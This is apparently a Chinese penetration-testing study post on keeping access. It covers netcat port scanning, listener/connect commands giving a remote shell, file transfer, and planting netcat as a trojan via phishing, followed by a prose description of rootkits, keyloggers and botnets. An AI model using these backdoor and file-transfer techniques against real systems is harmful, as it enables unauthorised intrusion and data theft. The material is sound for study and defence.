記學習滲透測試之使用後門和惡意軟體保持訪問權五

working發表於2021-12-24

 netcat是一個作為網路分析工具編寫的應用程式。他可以使用任何埠在兩臺機器之間開啟TCP和UDP連線。如果需要或是其他方法無效,還可將其作用於類似於nmap的埠掃描工具。
 此外,netcat可用於向遠端系統開放一個連線。如果單獨使用netcat,則可以有效地在系統上開啟一個遠端shell。但如果將netcat捆綁在另一個可執行檔案中,則可以將其作用於木馬並將其傳遞給目標。

netcat只有一個可執行檔案,可以配置為客戶端或伺服器執行,取決於具體的目標。通常,使用netcat的過程包括將其植入受害系統,然後使用客戶端連線到系統,並向主機發出命令(可以透過製作一個木馬或其他方法,將該軟體部署到受害系統上實現)。也可以簡單地透過純粹的社會工程方法(如網路釣魚),將該軟體植入受害系統上。
此時假定netcat已經存在受害者客戶端(Windows)中,我們可以隨意安裝和配置netcat軟體。要使用netcat,首先要了解他的語法和工作原理。基礎語法為:
cc [選項] <主機地址> <埠號>
該命令將以類似Telnet的方式,向由主機地址和埠號定義的遠端系統傳送請求。
和Telnet十分類似,netcat並不加密也不採取其他措施保護通訊,因此可能對其進行竊聽和監測。
如果需要更高的隱藏級別,也可以建立到主機的UDP連線。要使用基於UDP的連線,只需要執行以下命令:
nc -u <主機地址> <埠號>
瞭解這一基本語法後,即可使用netcat來執行先前進行的操作,例如埠掃描,執行以下命令:
nc -z -v <主機地址> 1-1000

 該命令將掃描1到1000的所有埠。-z選項使netcat不嘗試連線,從而降低被檢測的風險。最後,-v將netcat置於詳情模式,此模式可提供有關其正在執行的操作的更多資訊,輸出一般與下圖類似

記學習滲透測試之使用後門和惡意軟體保持訪問權五

該掃描將提供大量資訊,但掃描完成後,即可知道目標開啟或關閉了哪些埠。
現在設想將netcat作為木馬部署到系統中。在受害者不知不覺地將該軟體安裝在他們的系統中後,即可達到使用這種技術掃描受害者自己網路中的其他主機。
返回的訊息將傳送到標準錯誤(standard error)。可將標準錯誤訊息傳送到標準輸出,這樣可便於過濾結果。

與netcat通訊

 netcat具備很多功能,例如在主機之間進行通訊。可在客戶機-伺服器關係中連線netcat的兩個例項並進行通訊。
 兩臺計算機中伺服器和客戶端是在初始配置中設定的,然後即可進行通訊。建立連線後,兩點之間的雙向通訊是完全同步的。
 要進行此類通訊,必須執行幾步操作。首先,需要定義客戶端,可以透過執行以下命令來完成:

nc -l 4444
zhejiang配置netcat偵聽埠4444的連線
接下來,在第二臺機器上透過執行以下命令發起連線:
netcat zebes.com 4444
在客戶端中,因為沒有開啟任何命令視窗,似乎沒有任何事情發生。但是,在連線成功時,將在系統上得到一個命令提示符,可從中向遠端主機發出命令。
完成訊息傳遞後,只需要按Ctrl+D即可關閉連線。

使用netcat傳送檔案

基於上面的例子,還可以完成更有用的任務。下面介紹如何將檔案傳輸到遠端主機,之後利用此功能可以很容易地構建一些更強大的攻擊。因為建立了一個標準的TCP連線,可以透過該連線傳輸任何型別的資訊——在這種情況下,傳輸一個檔案。
為了實現這一點,必須首先選擇連線的一端為偵聽端。然而,在此並不是與上一個例子中一樣,將資訊列印到螢幕上,而是將所有資訊直接存入一個檔案中:
netcat -l 4444 > received_file
在第二臺計算機上,透過輸入以下內容建立一個簡單的文字檔案:
echo "Hello,this is a file" > original_file
現在即可使用此檔案,作為下一步向監聽計算機建立的netcat連線的輸入。該檔案將被傳輸到監聽計算機,就像它是以互動方式輸入的一樣:
netcat zebes.com 4444 < original_file
可以在偵聽連線的計算機上看到,其中現有一個名為received_file的新檔案,檔案中包含另一臺計算機上所輸入的檔案的內容:
Notepad received_file
Hello,this is a file
如你所見,透過使用netcat,可以很容易地利用此連線傳輸各種資訊,包括整個目錄的資訊。

安裝rookit

rookit是一種非常危險的惡意軟體形式。這種型別的惡意軟體從核心級植入到計算機中,可以提供遠端訪問、系統資訊和資料資訊、執行偵察行動、安裝軟體以及執行許多其他任務,所有這些行為都不會向系統或使用者暴露其存在。

rookit最早出現於20世紀90年代,經過多年的演變,他變得更加危險。事實上,現代版本的rookit可以將其自身嵌入作業系統的核心,從而可以從根本上改變作業系統本身的行為。它們可以攔截來自作業系統(外延到應用程式)的請求,並用虛假資訊響應。由於rookit通常設計為從作業系統和系統日誌隱藏其程式,因此難以檢測和刪除。
在理想情況下,採用之前敘述的方法,例如木馬程式,攻擊者可以快速有效地將rookit植入系統中。接收惡意內容的使用者可能無意中啟用rookit並將其安裝到系統中。安裝過程快速而隱秘,不會顯示任何危險訊號。在其他情況下,僅僅是瀏覽網頁時訪問受感染網站的行為就足以導致感染。
在安裝rookit後,只要目標計算機聯機,駭客即可秘密的與其通訊,以觸發任務或竊取資訊。在其他情況下,rookit可用於安裝更多的隱藏程式,並在系統中建立“後門”。如果駭客想竊取資訊,可以安裝一個鍵盤記錄程式。該程式將在線上和離線狀態下,秘密記錄受害者錄入的所有內容,並在下一次有機會時,將結果提供給攻擊者。
rookit的其他惡意用途包括攻擊數百甚至數十萬臺計算機,形成一個稱為“殭屍網路(botnet)”的遠端“rookit網路”。殭屍網路用於向其他計算機發動分散式拒絕服務(DDoS)攻擊,傳送垃圾郵件、病毒和木馬。這項活動如果追溯到發件人,可能會導致rookit網路的受害者被當成有惡意目的的攻擊者。
本作品採用《CC 協議》,轉載必須註明作者和本文連結
理想的光照不到現實的黑暗,明燈是黑夜中的奢侈品。如果你接受不了真實生活千瘡百孔的消極,那麼,請移步兒童區...

相關文章